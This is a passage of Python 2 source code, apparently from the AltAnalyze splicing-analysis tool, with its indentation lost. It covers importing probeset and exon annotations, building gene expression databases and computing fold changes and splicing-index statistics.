os.chmod(app_dir,0777)
openFile(app_dir2)
except Exception:
try: openFile(app_dir)
except Exception:
os.chmod(app_dir,0777)
openFile(app_dir)
else:
try: openFile(app_dir)
except Exception:
os.chmod(app_dir,0777)
openFile(app_dir)
def createCytoscapeDesktop(cytoscape_dir):
cyto_ds_output = cytoscape_dir+'/Cytoscape.desktop'
data = export.ExportFile(cyto_ds_output)
cytoscape_desktop = cytoscape_dir+'/Cytoscape'; #cytoscape_desktop = '/hd3/home/nsalomonis/Cytoscape_v2.6.1/Cytoscape'
cytoscape_png = cytoscape_dir+ '/.install4j/Cytoscape.png'; #cytoscape_png = '/hd3/home/nsalomonis/Cytoscape_v2.6.1/.install4j/Cytoscape.png'
data.write('[Desktop Entry]'+'\n')
data.write('Type=Application'+'\n')
data.write('Name=Cytoscape'+'\n')
data.write('Exec=/bin/sh "'+cytoscape_desktop+'"'+'\n')
data.write('Icon='+cytoscape_png+'\n')
data.write('Categories=Application;'+'\n')
data.close()
########### Parse Input Annotations ###########
def ProbesetCalls(array_type,probeset_class,splice_event,constitutive_call,external_exonid):
include_probeset = 'yes'
if array_type == 'AltMouse':
exonid = splice_event
if filter_probesets_by == 'exon':
if '-' in exonid or '|' in exonid: ###Therfore the probeset represents an exon-exon junction or multi-exon probeset
include_probeset = 'no'
if filter_probesets_by != 'exon':
if '|' in exonid: include_probeset = 'no'
if constitutive_call == 'yes': include_probeset = 'yes'
else:
if avg_all_for_ss == 'yes' and (probeset_class == 'core' or len(external_exonid)>2): constitutive_call = 'yes'
#if len(splice_event)>2 and constitutive_call == 'yes' and avg_all_for_ss == 'no': constitutive_call = 'no'
if constitutive_call == 'no' and len(splice_event)<2 and len(external_exonid)<2: ###otherwise these are interesting probesets to keep
if filter_probesets_by != 'full':
if filter_probesets_by == 'extended':
if probeset_class == 'full': include_probeset = 'no'
elif filter_probesets_by == 'core':
if probeset_class != 'core': include_probeset = 'no'
return include_probeset,constitutive_call
def EvidenceOfAltSplicing(slicing_annot):
splice_annotations = ["ntron","xon","strangeSplice","Prime","3","5","C-term"]; as_call = 0
splice_annotations2 = ["ntron","assette","strangeSplice","Prime","3","5"]
for annot in splice_annotations:
if annot in slicing_annot: as_call = 1
if as_call == 1:
if "C-term" in slicing_annot and ("N-" in slicing_annot or "Promoter" in slicing_annot):
as_call = 0
for annot in splice_annotations2:
if annot in slicing_annot: as_call = 1
elif "bleed" in slicing_annot and ("N-" in slicing_annot or "Promoter" in slicing_annot):
as_call = 0
for annot in splice_annotations2:
if annot in slicing_annot: as_call = 1
return as_call
########### Begin Analyses ###########
class SplicingAnnotationData:
def ArrayType(self):
self._array_type = array_type
return self._array_type
def Probeset(self): return self._probeset
def setProbeset(self,probeset): self._probeset = probeset
def ExonID(self): return self._exonid
def setDisplayExonID(self,exonid): self._exonid = exonid
def GeneID(self): return self._geneid
def Symbol(self):
symbol = ''
if self.GeneID() in annotate_db:
y = annotate_db[self.GeneID()]
symbol = y.Symbol()
return symbol
def ExternalGeneID(self): return self._external_gene
def ProbesetType(self):
###e.g. Exon, junction, constitutive(gene)
return self._probeset_type
def GeneStructure(self): return self._block_structure
def SecondaryExonID(self): return self._block_exon_ids
def setSecondaryExonID(self,ids): self._block_exon_ids = ids
def setLocationData(self, chromosome, strand, probeset_start, probeset_stop):
self._chromosome = chromosome; self._strand = strand
self._start = probeset_start; self._stop = probeset_stop
def LocationSummary(self):
location = self.Chromosome()+':'+self.ProbeStart()+'-'+self.ProbeStop()+'('+self.Strand()+')'
return location
def Chromosome(self): return self._chromosome
def Strand(self): return self._strand
def ProbeStart(self): return self._start
def ProbeStop(self): return self._stop
def ProbesetClass(self):
###e.g. core, extendended, full
return self._probest_class
def ExternalExonIDs(self): return self._external_exonids
def ExternalExonIDList(self):
external_exonid_list = string.split(self.ExternalExonIDs(),'|')
return external_exonid_list
def Constitutive(self): return self._constitutive_status
def setTranscriptCluster(self,secondary_geneid): self._secondary_geneid = secondary_geneid
def setNovelExon(self,novel_exon): self._novel_exon = novel_exon
def NovelExon(self): return self._novel_exon
def SecondaryGeneID(self): return self._secondary_geneid
def setExonRegionID(self,exon_region): self._exon_region = exon_region
def ExonRegionID(self): return self._exon_region
def SplicingEvent(self):
splice_event = self._splicing_event
if len(splice_event)!=0:
if splice_event[0] == '|': splice_event = splice_event[1:]
return splice_event
def SplicingCall(self): return self._splicing_call
def SpliceJunctions(self): return self._splice_junctions
def Delete(self): del self
def Report(self):
output = self.ArrayType() +'|'+ self.ExonID() +'|'+ self.ExternalGeneID()
return output
def __repr__(self): return self.Report()
class AltMouseData(SplicingAnnotationData):
def __init__(self,affygene,exons,ensembl,block_exon_ids,block_structure,probe_type_call):
self._geneid = affygene; self._external_gene = ensembl; self._exonid = exons; self._secondary_geneid = ensembl
self._probeset_type = probe_type_call; self._block_structure = block_structure; self._block_exon_ids = block_exon_ids
self._external_exonids = 'NA';
self._constitutive_status = 'no'
self._splicing_event = ''
self._secondary_geneid = 'NA'
self._exon_region = ''
if self._probeset_type == 'gene': self._constitutive_status = 'yes'
else: self._constitutive_status = 'no'
class AffyExonSTData(SplicingAnnotationData):
def __init__(self,ensembl_gene_id,exon_id,ens_exon_ids, constitutive_call_probeset, exon_region, splicing_event, splice_junctions, splicing_call):
self._geneid = ensembl_gene_id; self._external_gene = ensembl_gene_id; self._exonid = exon_id
self._constitutive_status = constitutive_call_probeset#; self._start = probeset_start; self._stop = probeset_stop
self._external_exonids = ens_exon_ids; #self._secondary_geneid = transcript_cluster_id#; self._chromosome = chromosome; self._strand = strand
self._exon_region=exon_region; self._splicing_event=splicing_event; self._splice_junctions=splice_junctions; self._splicing_call = splicing_call
if self._exonid[0] == 'U': self._probeset_type = 'UTR'
elif self._exonid[0] == 'E': self._probeset_type = 'exonic'
elif self._exonid[0] == 'I': self._probeset_type = 'intronic'
class AffyExonSTDataAbbreviated(SplicingAnnotationData):
def __init__(self,ensembl_gene_id,exon_id,splicing_call):
self._geneid = ensembl_gene_id; self._exonid = exon_id; self._splicing_call = splicing_call
def importSplicingAnnotations(array_type,Species,probeset_type,avg_ss_for_all,root_dir):
global filter_probesets_by; filter_probesets_by = probeset_type
global species; species = Species; global avg_all_for_ss; avg_all_for_ss = avg_ss_for_all; global exon_db; exon_db={}
global summary_data_db; summary_data_db={}; global remove_intronic_junctions; remove_intronic_junctions = 'no'
if array_type == 'RNASeq':
probeset_annotations_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
else: probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_probesets.txt'
filtered_arrayids={};filter_status='no'
constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
return exon_db, constitutive_probeset_db
def importSplicingAnnotationDatabase(filename,array_type,filtered_arrayids,filter_status):
begin_time = time.time()
probesets_included_by_new_evidence = 0; export_exon_regions = 'yes'
if 'fake' in array_type: array_type = string.replace(array_type,'-fake',''); original_arraytype = 'RNASeq'
else: original_arraytype = array_type
if filter_status == 'no': global gene_transcript_cluster_db; gene_transcript_cluster_db={}; gene_transcript_cluster_db2={}; global last_exon_region_db; last_exon_region_db = {}
else: new_exon_db={}
fn=filepath(filename)
last_gene = ' '; last_exon_region = ''
constitutive_probeset_db = {}; constitutive_gene = {}
count = 0; x = 0; constitutive_original = {}
#if filter_status == 'yes': exon_db = {}
if array_type == 'AltMouse':
for line in open(fn,'rU').xreadlines():
probeset_data = cleanUpLine(line) #remove endline
probeset,affygene,exons,transcript_num,transcripts,probe_type_call,ensembl,block_exon_ids,block_structure,comparison_info = string.split(probeset_data,'\t')
###note: currently exclude comparison_info since not applicable for existing analyses
if x == 0: x = 1
else:
if exons[-1] == '|': exons = exons[0:-1]
if affygene[-1] == '|': affygene = affygene[0:-1]; constitutive_gene[affygene]=[]
if probe_type_call == 'gene': constitutive_call = 'yes' #looked through the probe annotations and the gene seems to be the most consistent constitutive feature
else: constitutive_call = 'no'
include_call,constitutive_call = ProbesetCalls(array_type,'',exons,constitutive_call,'')
if include_call == 'yes':
probe_data = AltMouseData(affygene,exons,ensembl,block_exon_ids,block_structure,probe_type_call) #this used to just have affygene,exon in the values (1/17/05)
exon_db[probeset] = probe_data
if filter_status == 'yes': new_exon_db[probeset] = probe_data
if constitutive_call == 'yes': constitutive_probeset_db[probeset] = affygene
genes_being_analyzed = constitutive_gene
else:
for line in open(fn,'rU').xreadlines():
probeset_data = cleanUpLine(line) #remove endline
if x == 0: x = 1
else:
try: probeset_id, exon_id, ensembl_gene_id, transcript_cluster_id, chromosome, strand, probeset_start, probeset_stop, affy_class, constitutive_call_probeset, external_exonid, ens_const_exons, exon_region, exon_region_start, exon_region_stop, splicing_event, splice_junctions = string.split(probeset_data,'\t')
except Exception: print probeset_data;force_error
if affy_class == 'free': affy_class = 'full' ### Don't know what the difference is
include_call,constitutive_call = ProbesetCalls(array_type,affy_class,splicing_event,constitutive_call_probeset,external_exonid)
#if 'ENSG00000163904:E11.5' in probeset_id: print probeset_data
#print array_type,affy_class,splicing_event,constitutive_call_probeset,external_exonid,constitutive_call,include_call;kill
if array_type == 'junction' and '.' not in exon_id: exon_id = string.replace(exon_id,'-','.'); exon_region = string.replace(exon_region,'-','.')
if ensembl_gene_id != last_gene: new_gene = 'yes'
else: new_gene = 'no'
if filter_status == 'no' and new_gene == 'yes':
if '.' in exon_id: ### Exclude junctions
if '-' not in last_exon_region and 'E' in last_exon_region: last_exon_region_db[last_gene] = last_exon_region
else: last_exon_region_db[last_gene] = last_exon_region
last_gene = ensembl_gene_id
if len(exon_region)>1: last_exon_region = exon_region ### some probeset not linked to an exon region
###Record the transcript clusters assoicated with each gene to annotate the results later on
if constitutive_call_probeset!=constitutive_call: probesets_included_by_new_evidence +=1#; print probeset_id,[splicing_event],[constitutive_call_probeset];kill
proceed = 'no'; as_call = 0
if array_type == 'RNASeq' or array_type == 'junction': include_call = 'yes' ### Constitutive expression is not needed
if remove_intronic_junctions == 'yes':
if 'E' not in exon_id: include_call = 'no' ### Remove junctions that only have splice-sites within an intron or UTR
if include_call == 'yes' or constitutive_call == 'yes':
#if proceed == 'yes':
as_call = EvidenceOfAltSplicing(splicing_event)
if filter_status == 'no':
probe_data = AffyExonSTDataAbbreviated(ensembl_gene_id, exon_id, as_call)
if array_type != 'RNASeq':
probe_data.setTranscriptCluster(transcript_cluster_id)
try:
if export_exon_regions == 'yes':
probe_data.setExonRegionID(exon_region)
except Exception: null=[]
else:
probe_data = AffyExonSTData(ensembl_gene_id, exon_id, external_exonid, constitutive_call, exon_region, splicing_event, splice_junctions, as_call)
probe_data.setLocationData(chromosome, strand, probeset_start, probeset_stop)
if array_type != 'RNASeq':
probe_data.setTranscriptCluster(transcript_cluster_id)
else:
probe_data.setNovelExon(affy_class)
if filter_status == 'yes':
try: ### saves memory
null = filtered_arrayids[probeset_id]
new_exon_db[probeset_id] = probe_data
except KeyError: null = []
else: exon_db[probeset_id] = probe_data
if constitutive_call == 'yes' and filter_status == 'no': ###only perform function when initially running
constitutive_probeset_db[probeset_id] = ensembl_gene_id
try: constitutive_gene[ensembl_gene_id].append(probeset_id)
except Exception: constitutive_gene[ensembl_gene_id] = [probeset_id]
###Only consider transcript clusters that make up the constitutive portion of the gene or that are alternatively regulated
if array_type != 'RNASeq':
try: gene_transcript_cluster_db[ensembl_gene_id].append(transcript_cluster_id)
except KeyError: gene_transcript_cluster_db[ensembl_gene_id] = [transcript_cluster_id]
if constitutive_call_probeset == 'yes' and filter_status == 'no': ###only perform function when initially running
try: constitutive_original[ensembl_gene_id].append(probeset_id)
except KeyError: constitutive_original[ensembl_gene_id] = [probeset_id]
if array_type != 'RNASeq':
try: gene_transcript_cluster_db2[ensembl_gene_id].append(transcript_cluster_id)
except KeyError: gene_transcript_cluster_db2[ensembl_gene_id] = [transcript_cluster_id]
###If no constitutive probesets for a gene as a result of additional filtering (removing all probesets associated with a splice event), add these back
original_probesets_add = 0; genes_being_analyzed = {}
for gene in constitutive_gene: genes_being_analyzed[gene]=[]
for gene in constitutive_original:
if gene not in constitutive_gene:
genes_being_analyzed[gene] = [gene]
constitutive_gene[gene]=[]
original_probesets_add +=1
gene_transcript_cluster_db[gene] = gene_transcript_cluster_db2[gene]
for probeset in constitutive_original[gene]: constitutive_probeset_db[probeset] = gene
#if array_type == 'junction' or array_type == 'RNASeq':
### Added the below in 1.16!!!
### If no constitutive probesets for a gene assigned, assign all gene probesets
for probeset in exon_db:
gene = exon_db[probeset].GeneID()
proceed = 'no'
exonid = exon_db[probeset].ExonID()
### Rather than add all probesets, still filter based on whether the probeset is in an annotated exon
if 'E' in exonid and 'I' not in exonid and '_' not in exonid: proceed = 'yes'
if proceed == 'yes':
if gene not in constitutive_gene:
constitutive_probeset_db[probeset] = gene
genes_being_analyzed[gene] = [gene]
### DO NOT ADD TO constitutive_gene SINCE WE WANT ALL mRNA ALIGNING EXONS/JUNCTIONS TO BE ADDED!!!!
#constitutive_gene[gene]=[]
gene_transcript_cluster_db = eliminate_redundant_dict_values(gene_transcript_cluster_db)
#if affygene == 'ENSMUSG00000023089': print [abs(fold_change_log)],[log_fold_cutoff];kill
if array_type == 'RNASeq':
import RNASeq
try: last_exon_region_db = RNASeq.importExonAnnotations(species,'distal-exon','')
except Exception: null=[]
constitutive_original=[]; constitutive_gene=[]
#clearObjectsFromMemory(exon_db); constitutive_probeset_db=[];genes_being_analyzed=[] ### used to evaluate how much memory objects are taking up
#print 'remove_intronic_junctions:',remove_intronic_junctions
#print constitutive_gene['ENSMUSG00000031170'];kill ### Determine if avg_ss_for_all is working
if original_arraytype == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print len(exon_db),id_name,'stored as instances of SplicingAnnotationData in memory'
#print len(constitutive_probeset_db),'array IDs stored as constititive'
#print probesets_included_by_new_evidence, 'array IDs were re-annotated as NOT constitutive based on mRNA evidence'
if array_type != 'AltMouse': print original_probesets_add, 'genes not viewed as constitutive as a result of filtering',id_name,'based on splicing evidence, added back'
end_time = time.time(); time_diff = int(end_time-begin_time)
#print filename,"import finished in %d seconds" % time_diff
if filter_status == 'yes': return new_exon_db
else:
summary_data_db['gene_assayed'] = len(genes_being_analyzed)
try: exportDenominatorGenes(genes_being_analyzed)
except Exception: null=[]
return constitutive_probeset_db,exon_db,genes_being_analyzed
def exportDenominatorGenes(genes_being_analyzed):
goelite_output = root_dir+'GO-Elite/denominator/AS.denominator.txt'
goelite_data = export.ExportFile(goelite_output)
systemcode = 'En'
goelite_data.write("GeneID\tSystemCode\n")
for gene in genes_being_analyzed:
if array_type == 'AltMouse':
try: gene = annotate_db[gene].ExternalGeneID()
except KeyError: null = []
goelite_data.write(gene+'\t'+systemcode+'\n')
try: goelite_data.close()
except Exception: null=[]
def performExpressionAnalysis(filename,constitutive_probeset_db,exon_db,annotate_db,dataset_name):
#if analysis_method == 'splicing-index': returnLargeGlobalVars();kill ### used to ensure all large global vars from the reciprocal junction analysis have been cleared from memory
#returnLargeGlobalVars()
"""import list of expression values for arrayids and calculates statistics"""
global fold_dbase; global original_conditions; global normalization_method
stats_dbase = {}; fold_dbase={}; ex_db={}; si_db=[]; bad_row_import = {}; count=0
global array_group_name_db; array_group_name_db = {}
global array_group_db; array_group_db = {};
global array_raw_group_values; array_raw_group_values = {}; global original_array_names; original_array_names=[]
global max_replicates; global equal_replicates; global array_group_list
array_index_list = [] ###Use this list for permutation analysis
fn=filepath(filename); line_num = 1
for line in open(fn,'rU').xreadlines():
data = cleanUpLine(line); t = string.split(data,'\t'); probeset = t[0]
if t[0]== '#': null=[] ### Don't import line
elif line_num == 1:
line_num += 1 #makes this value null for the next loop of actual array data
###Below ocucrs if the data is raw opposed to precomputed
if ':' in t[1]:
array_group_list = []; x=0 ###gives us an original index value for each entry in the group
for entry in t[1:]:
original_array_names.append(entry)
aa = string.split(entry,':')
try: array_group,array_name = aa
except Exception: array_name = string.join(aa[1:],':'); array_group = aa[0]
try:
array_group_db[array_group].append(x)
array_group_name_db[array_group].append(array_name)
except KeyError:
array_group_db[array_group] = [x]
array_group_name_db[array_group] = [array_name]
### below only occurs with a new group addition
array_group_list.append(array_group) #use this to generate comparisons in the below linked function
x += 1
else:
#try: print data_type
#except Exception,exception:
#print exception
#print traceback.format_exc()
print_out = 'The AltAnalyze filtered expression file "'+filename+'" is not propperly formatted.\n Review formatting requirements if this file was created by another application.\n'
print_out += "\nFirst line\n"+line
try: UI.WarningWindow(print_out,'Exit'); print print_out
except Exception: print print_out
badExit()
else:
#if probeset in exon_db:
#if exon_db[probeset].GeneID() == 'ENSG00000139970':
###Use the index values from above to assign each expression value to a new database
temp_group_array = {}
line_num+=1
for group in array_group_db:
if count == 0: array_index_list.append(array_group_db[group])
for array_index in array_group_db[group]:
try: exp_val = float(t[array_index+1])
except Exception:
if 'Gene_ID' not in line: bad_row_import[probeset]=line; exp_val = 1
###appended is the numerical expression value for each array in the group (temporary array)
try: temp_group_array[group].append(exp_val) #add 1 since probeset is the first column
except KeyError: temp_group_array[group] = [exp_val]
if count == 0: array_index_list.sort(); count = 1
####store the group database within the probeset database entry
try:
null = exon_db[probeset] ###To conserve memory, don't store any probesets not used for downstream analyses (e.g. not linked to mRNAs)
#if 'ENSG00000139970' in probeset:
#print [max_exp]
#print t[1:];kill
#max_exp = max(map(float, t[1:]))
#if len(array_raw_group_values)>10000: break
#if max_exp>math.log(70,2):
array_raw_group_values[probeset] = temp_group_array
except KeyError:
#print probeset
pass
print len(array_raw_group_values), 'sequence identifiers imported out of', line_num-1
if len(bad_row_import)>0:
print len(bad_row_import), "Rows with an unexplained import error processed and deleted."
print "Example row:"; x=0
for i in bad_row_import:
if x==0: print bad_row_import[i]
try: del array_raw_group_values[i]
except Exception: null=[]
x+=1
### If no gene expression reporting probesets were imported, update constitutive_probeset_db to include all mRNA aligning probesets
cs_genedb={}; missing_genedb={}; addback_genedb={}; rnaseq_cs_gene_db={}
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
#if gene == 'ENSG00000185008': print [probeset]
try:
null=array_raw_group_values[probeset]; cs_genedb[gene]=[]
if gene == probeset: rnaseq_cs_gene_db[gene]=[] ### If RPKM normalization used, use the gene expression values already calculated
except Exception: missing_genedb[gene]=[] ### Collect possible that are missing from constitutive database (verify next)
for gene in missing_genedb:
try: null=cs_genedb[gene]
except Exception: addback_genedb[gene]=[]
for probeset in array_raw_group_values:
try:
gene = exon_db[probeset].GeneID()
try:
null=addback_genedb[gene]
if 'I' not in probeset and 'U' not in probeset: ### No intron or UTR containing should be used for constitutive expression
null=string.split(probeset,':')
if len(null)<3: ### No trans-gene junctions should be used for constitutive expression
constitutive_probeset_db[probeset]=gene
except Exception: null=[]
except Exception: null=[]
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
#if gene == 'ENSG00000185008': print [[probeset]]
### Only examine values for associated exons when determining RNASeq constitutive expression (when exon data is present)
normalization_method = 'raw'
if array_type == 'RNASeq':
junction_count=0; constitutive_probeset_db2={}
for uid in constitutive_probeset_db:
if '-' in uid: junction_count+=1
if len(rnaseq_cs_gene_db)>0: ### If filtered RPKM gene-level expression data present, use this instead (and only this)
normalization_method = 'RPKM'
constitutive_probeset_db={} ### Re-set this database
for gene in rnaseq_cs_gene_db:
constitutive_probeset_db[gene]=gene
elif junction_count !=0 and len(constitutive_probeset_db) != junction_count:
### occurs when there is a mix of junction and exon IDs
for uid in constitutive_probeset_db:
if '-' not in uid: constitutive_probeset_db2[uid] = constitutive_probeset_db[uid]
constitutive_probeset_db = constitutive_probeset_db2; constitutive_probeset_db2=[]
"""
for probeset in constitutive_probeset_db:
gene = constitutive_probeset_db[probeset]
if gene == 'ENSG00000185008': print [probeset]
"""
###Build all putative splicing events
global alt_junction_db; global exon_dbase; global critical_exon_db; critical_exon_db={}
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
### Applies to reciprocal junction analyses only
if array_type == 'AltMouse':
alt_junction_db,critical_exon_db,exon_dbase,exon_inclusion_db,exon_db = ExonAnnotate_module.identifyPutativeSpliceEvents(exon_db,constitutive_probeset_db,array_raw_group_values,agglomerate_inclusion_probesets,onlyAnalyzeJunctions)
print 'Number of Genes with Examined Splice Events:',len(alt_junction_db)
elif (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null':
from build_scripts import JunctionArray
alt_junction_db,critical_exon_db,exon_dbase,exon_inclusion_db,exon_db = JunctionArray.getPutativeSpliceEvents(species,array_type,exon_db,agglomerate_inclusion_probesets,root_dir)
print 'Number of Genes with Examined Splice Events:',len(alt_junction_db)
#alt_junction_db=[]; critical_exon_db=[]; exon_dbase=[]; exon_inclusion_db=[]
if agglomerate_inclusion_probesets == 'yes':
array_raw_group_values = agglomerateInclusionProbesets(array_raw_group_values,exon_inclusion_db)
exon_inclusion_db=[]
### For datasets with high memory requirements (RNASeq), filter the current and new databases
### Begin this function after agglomeration to ensure agglomerated probesets are considered
reciprocal_probesets = {}
if array_type == 'junction' or array_type == 'RNASeq':
for affygene in alt_junction_db:
for event in alt_junction_db[affygene]:
reciprocal_probesets[event.InclusionProbeset()]=[]
reciprocal_probesets[event.ExclusionProbeset()]=[]
not_evalutated={}
for probeset in array_raw_group_values:
try: null=reciprocal_probesets[probeset]
except Exception:
### Don't remove constitutive probesets
try: null=constitutive_probeset_db[probeset]
except Exception: not_evalutated[probeset]=[]
#print 'Removing',len(not_evalutated),'exon/junction IDs not evaulated for splicing'
for probeset in not_evalutated:
del array_raw_group_values[probeset]
###Check to see if we have precomputed expression data or raw to be analyzed
x=0; y=0; array_raw_group_values2={}; probesets_to_delete=[] ### Record deleted probesets
if len(array_raw_group_values)==0:
print_out = "No genes were considered 'Expressed' based on your input options. Check to make sure that the right species database is indicated and that the right data format has been selected (e.g., non-log versus log expression)."
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()
elif len(array_raw_group_values)>0:
###array_group_list should already be unique and correctly sorted (see above)
for probeset in array_raw_group_values:
data_lists=[]
for group_name in array_group_list:
data_list = array_raw_group_values[probeset][group_name] ###nested database entry access - baseline expression
if global_addition_factor > 0: data_list = addGlobalFudgeFactor(data_list,'log')
data_lists.append(data_list)
if len(array_group_list)==2:
data_list1 = data_lists[0]; data_list2 = data_lists[-1]; avg1 = statistics.avg(data_list1); avg2 = statistics.avg(data_list2)
log_fold = avg2 - avg1
try:
#t,df,tails = statistics.ttest(data_list1,data_list2,2,3) #unpaired student ttest, calls p_value function
#t = abs(t); df = round(df) #Excel doesn't recognize fractions in a DF
#p = statistics.t_probability(t,df)
p = statistics.runComparisonStatistic(data_list1,data_list2,probability_statistic)
if p == -1:
if len(data_list1)>1 and len(data_list2)>1:
print_out = "The probability statistic selected ("+probability_statistic+") is not compatible with the\nexperimental design. Please consider an alternative statistic or correct the problem.\nExiting AltAnalyze."
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()
else: p = 1
except Exception: p = 1
fold_dbase[probeset] = [0]; fold_dbase[probeset].append(log_fold)
stats_dbase[probeset]=[avg1]; stats_dbase[probeset].append(p)
###replace entries with the two lists for later permutation analysis
if p == -1: ### should by p == 1: Not sure why this filter was here, but mistakenly removes probesets where there is just one array for each group
del fold_dbase[probeset];del stats_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
if x == 1: print 'Bad data detected...', data_list1, data_list2
elif (avg1 < expression_threshold and avg2 < expression_threshold and p > p_threshold) and array_type != 'RNASeq': ### Inserted a filtering option to exclude small variance, low expreession probesets
del fold_dbase[probeset];del stats_dbase[probeset]; probesets_to_delete.append(probeset); x += 1
else: array_raw_group_values2[probeset] = [data_list1,data_list2]
else: ###Non-junction analysis can handle more than 2 groups
index=0
for data_list in data_lists:
try: array_raw_group_values2[probeset].append(data_list)
except KeyError: array_raw_group_values2[probeset] = [data_list]
if len(array_group_list)>2: ### Thus, there is some variance for this probeset
### Create a complete stats_dbase containing all fold changes
if index==0:
avg_baseline = statistics.avg(data_list); stats_dbase[probeset] = [avg_baseline]
else:
avg_exp = statistics.avg(data_list)
log_fold = avg_exp - avg_baseline
try: fold_dbase[probeset].append(log_fold)
except KeyError: fold_dbase[probeset] = [0,log_fold]
index+=1
if array_type == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
array_raw_group_values = array_raw_group_values2; array_raw_group_values2=[]
print x, id_name,"excluded prior to analysis... predicted not detected"
global original_avg_const_exp_db; global original_fold_dbase
global avg_const_exp_db; global permute_lists; global midas_db
if len(array_raw_group_values)>0:
adj_fold_dbase, nonlog_NI_db, conditions, gene_db, constitutive_gene_db, constitutive_fold_change, original_avg_const_exp_db = constitutive_exp_normalization(fold_dbase,stats_dbase,exon_db,constitutive_probeset_db)
stats_dbase=[] ### No longer needed after this point
original_fold_dbase = fold_dbase; avg_const_exp_db = {}; permute_lists = []; y = 0; original_conditions = conditions; max_replicates,equal_replicates = maxReplicates()
gene_expression_diff_db = constitutive_expression_changes(constitutive_fold_change,annotate_db) ###Add in constitutive fold change filter to assess gene expression for ASPIRE
while conditions > y:
avg_const_exp_db = constitutive_exp_normalization_raw(gene_db,constitutive_gene_db,array_raw_group_values,exon_db,y,avg_const_exp_db); y+=1
#print len(avg_const_exp_db),constitutive_gene_db['ENSMUSG00000054850']
###Export Analysis Results for external splicing analysis (e.g. MiDAS format)
if run_MiDAS == 'yes' and normalization_method != 'RPKM': ### RPKM has negative values which will crash MiDAS
status = ResultsExport_module.exportTransitResults(array_group_list,array_raw_group_values,array_group_name_db,avg_const_exp_db,adj_fold_dbase,exon_db,dataset_name,apt_location)
print "Finished exporting input data for MiDAS analysis"
try: midas_db = ResultsExport_module.importMidasOutput(dataset_name)
except Exception: midas_db = {} ### Occurs if there are not enough samples to calculate a MiDAS p-value
else: midas_db = {}
###Provides all pairwise permuted group comparisons
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
permute_lists = statistics.permute_arrays(array_index_list)
### Now remove probesets from the analysis that were used to evaluate gene expression
for probeset in constitutive_probeset_db:
try: null = reciprocal_probesets[probeset]
except Exception:
try: del array_raw_group_values[probeset]
except Exception: null=[]
not_evalutated=[]; reciprocal_probesets=[]
constitutive_probeset_db=[]
### Above, all conditions were examined when more than 2 are present... change this so that only the most extreeem are analyzed further
if len(array_group_list)>2 and analysis_method == 'splicing-index' and (array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null'): ### USED FOR MULTIPLE COMPARISONS
print 'Calculating splicing-index values for multiple group comparisons (please be patient)...',
"""
if len(midas_db)==0:
print_out = 'Warning!!! MiDAS failed to run for multiple groups. Please make\nsure there are biological replicates present for your groups.\nAltAnalyze requires replicates for multi-group (more than two) analyses.'
try: UI.WarningWindow(print_out,'Exit')
except Exception: print print_out; print "Exiting program"
badExit()"""
if filter_for_AS == 'yes':
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del nonlog_NI_db[probeset]
except KeyError: null=[]
if export_NI_values == 'yes':
export_exon_regions = 'yes'
### Currently, we don't deal with raw adjusted expression values, just group, so just export the values for each group
summary_output = root_dir+'AltResults/RawSpliceData/'+species+'/'+analysis_method+'/'+dataset_name[:-1]+'.txt'
print "Exporting all normalized intensities to:\n"+summary_output
adjoutput = export.ExportFile(summary_output)
title = string.join(['Gene\tExonID\tprobesetID']+original_array_names,'\t')+'\n'; adjoutput.write(title)
### Pick which data lists have the most extreem values using the NI_dbase (adjusted folds for each condition)
original_increment = int(len(nonlog_NI_db)/20); increment = original_increment; interaction = 0
for probeset in nonlog_NI_db:
if interaction == increment: increment+=original_increment; print '*',
interaction +=1
geneid = exon_db[probeset].GeneID(); ed = exon_db[probeset]
index=0; NI_list=[] ### Add the group_name to each adj fold value
for NI in nonlog_NI_db[probeset]:
NI_list.append((NI,index)); index+=1 ### setup to sort for the extreeme adj folds and get associated group_name using the index
raw_exp_vals = array_raw_group_values[probeset]
adj_exp_lists={} ### Store the adjusted expression values for each group
if geneid in avg_const_exp_db:
k=0; gi=0; adj_exp_vals = []
for exp_list in raw_exp_vals:
for exp in exp_list:
adj_exp_val = exp-avg_const_exp_db[geneid][k]
try: adj_exp_lists[gi].append(adj_exp_val)
except Exception: adj_exp_lists[gi] = [adj_exp_val]
if export_NI_values == 'yes': adj_exp_vals.append(str(adj_exp_val))
k+=1
gi+=1
if export_NI_values == 'yes':
#print geneid+'-'+probeset, adj_exp_val, [ed.ExonID()];kill
if export_exon_regions == 'yes':
try: ### Thid will only work if ExonRegionID is stored in the abreviated AffyExonSTData object - useful in comparing results between arrays (exon-region centric)
if (array_type == 'exon' or array_type == 'gene') or '-' not in ed.ExonID(): ### only include exon entries not junctions
exon_regions = string.split(ed.ExonRegionID(),'|')
for er in exon_regions:
if len(er)>0: er = er
else:
try: er = ed.ExonID()
except Exception: er = 'NA'
ev = string.join([geneid+'\t'+er+'\t'+probeset]+adj_exp_vals,'\t')+'\n'
if len(filtered_probeset_db)>0:
if probeset in filtered_probeset_db: adjoutput.write(ev) ### This is used when we want to restrict to only probesets known to already by changed
else: adjoutput.write(ev)
except Exception:
ev = string.join([geneid+'\t'+'NA'+'\t'+probeset]+adj_exp_vals,'\t')+'\n'; adjoutput.write(ev)
NI_list.sort()
examine_pairwise_comparisons = 'yes'
if examine_pairwise_comparisons == 'yes':
k1=0; k2=0; filtered_NI_comps = []
NI_list_rev = list(NI_list); NI_list_rev.reverse()
